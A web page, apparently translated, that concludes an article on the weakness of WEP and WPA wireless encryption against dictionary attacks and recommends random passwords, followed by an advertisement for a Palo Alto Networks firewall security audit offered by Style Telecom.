So, it is not difficult to overcome the entire security system of a wireless network based on WEP encryption. Perhaps many will say that this is irrelevant, since the WEP protocol has long since died - it is not used. It was replaced by the more robust WPA protocol. However, let's not rush to conclusions. This is true, but only partly. The fact is that in some cases, to increase the range of a wireless network, so-called distributed wireless networks (WDS) are deployed based on several access points. The most interesting thing is that such networks do not support the WPA protocol and the only acceptable security measure in this case is the use of WEP encryption. In this case, WDS networks are hacked in exactly the same way as networks based on a single access point. In addition, PDAs equipped wireless module, also do not support the WPA protocol, so to include a PDA-based client in a wireless network, you must use the WEP protocol in it. Consequently, the WEP protocol will be in demand in wireless networks for a long time.

The examples of hacking of wireless networks that we have considered very clearly demonstrate their vulnerability. If we talk about the WEP protocol, it can be compared to foolproof protection. This is about the same as a car alarm - only it saves you from hooligans. As for such precautions as MAC address filtering and hidden network identifier mode, they cannot be considered as protection at all. Nevertheless, even such means should not be neglected, although only in combination with other measures.

The WPA protocol, although much more difficult to crack, is also vulnerable. However, do not lose heart - not everything is so hopeless. The fact is that the success of hacking a WPA secret key depends on whether it is in the dictionary or not. The standard dictionary we used is just over 40 MB in size, which is generally not that much. After three attempts, we managed to find a key that was not in the dictionary, and hacking the network turned out to be impossible. The number of words in this dictionary is only 6,475,760, which, of course, is very small. You can use dictionaries with a larger capacity, for example, on the Internet you can order a dictionary on three CDs, that is, almost 2 GB in size, but even it does not contain all possible passwords. Indeed, let's roughly calculate the number of passwords from 8 to 63 characters long that can be formed using 26 letters of the English alphabet (case sensitive), ten numbers and 32 letters of the Russian alphabet. It turns out that each symbol can be selected in 126 ways. Accordingly, if we take into account only passwords with a length of 8 characters, then the number of possible combinations will be 1268=6.3·1016. If the size of each word of 8 characters is 8 bytes, then the size of such a dictionary will be 4.5 million terabytes. But these are only combinations of eight symbols! What kind of dictionary will you get if you go through all possible combinations from 8 to 63 characters?! You don’t have to be a mathematician to calculate that the size of such a dictionary will be approximately 1.2·10119 TB.

So don't despair. There is a good chance that the password you are using is not in the dictionary. Just when choosing a password, you should not use words that make sense. It is best if it is a random set of characters - something like “FGproukqweRT4j563app”.

  • Do you have a clear picture of what's happening on your network?
  • Can you identify and see exactly what is happening on the network at any given time?
  • Do you know how many apps you use, who uses them and for what purposes?
  • Do you know how many threats - known and unknown - are attacking your network?

Find out what's really happening on a company's network by conducting free audit network security with Palo Alto Networks Next Generation Firewall. Based on the audit results, you will receive a detailed report on the current state of the network with a description of the applications used and identified threats in the company’s network.

The Style Telecom company has next-generation firewalls from Palo Alto Networks available to our Clients for use under the testing program as an assessment of the real level of security of the company and testing Palo Alto solutions. Our testing program will allow you to use the Palo Alto Networks firewall for 30 days and get a detailed picture of what is really happening on the company's network, what potential network threats to information security are present and recommendations for minimizing them.

Most of our clients have undergone a network security audit to provide a current assessment of their network security posture and now have an understanding of what applications are running on their network and what risks they pose. The advantage of this audit is that no changes to the network architecture are required; the firewall is installed transparently in the client's infrastructure in monitoring mode.

Based on the results of the network security audit, you will receive a report with detailed analytics network traffic, which will cover:

    • High-Risk Applications. In addition to legitimate software, users have access to cloud applications, applications remote access, malware, online games, etc. In the process of research, we find open cloud storage(Dropbox, Google Drive, Yandex Disk), P2P filesharing (Bittorrent and eMule), TeamViewer, Skype, social media. Although these applications are not malicious in nature, they are potentially dangerous in terms of reducing network performance and creating opportunities that can be used by attackers to compromise network security. The report will provide a detailed analysis of information on the applications used on the client's network.
    • Malicious detection software(viruses, exploits, ransomware). In most network security audits, malicious software (malware) was detected. Malware enters the company's network through partner networks, mobile devices, removable storage media and via Internet channels. If malware is detected, it is worth reviewing network segmentation, access policies, and usage policies mobile devices and removable media.
    • Detection of zero-day malware. As part of testing, the WildFire service is used, which provides heuristic and behavioral analysis, potentially dangerous files in an isolated environment before they are received by company users. Identification of zero-day attacks may indicate a targeted attack on the company and requires a detailed investigation of information security incidents in the client’s company.
    • Command analysis and query remote control(Command and Control server). Using the Palo Alto firewall and Threat Prevention subscription, you can identify infected systems malicious code and managed centrally from C&C servers with subsequent recommendations for localizing the problem.
    • Information by URL category. Uncontrolled Internet browsing exposes companies to additional risks. Often, links to web resources serve as sources of threats, leading to data loss and violations of corporate standards. Based on the results of the audit, information will be provided on the most frequently visited categories of sites on the Internet by company users.
    Style Telecom also offers an additional list of services:
    • Consultations on choosing a firewall system.
    • Conducting ME sizing taking into account the current needs and growth prospects of the company.
    • Configuration audit of existing firewalls.
    • Optimization of customized rules existing in MEs.
    • Migration of settings from existing firewalls to new firewalls.
    • Assessment of network infrastructure architectures and configurations and existing technical means information protection.
    • Design and implementation of firewall systems of any complexity.
    • Maintenance of firewall systems.
    You can familiarize yourself with the line of Palo Аlto Networks firewalls in our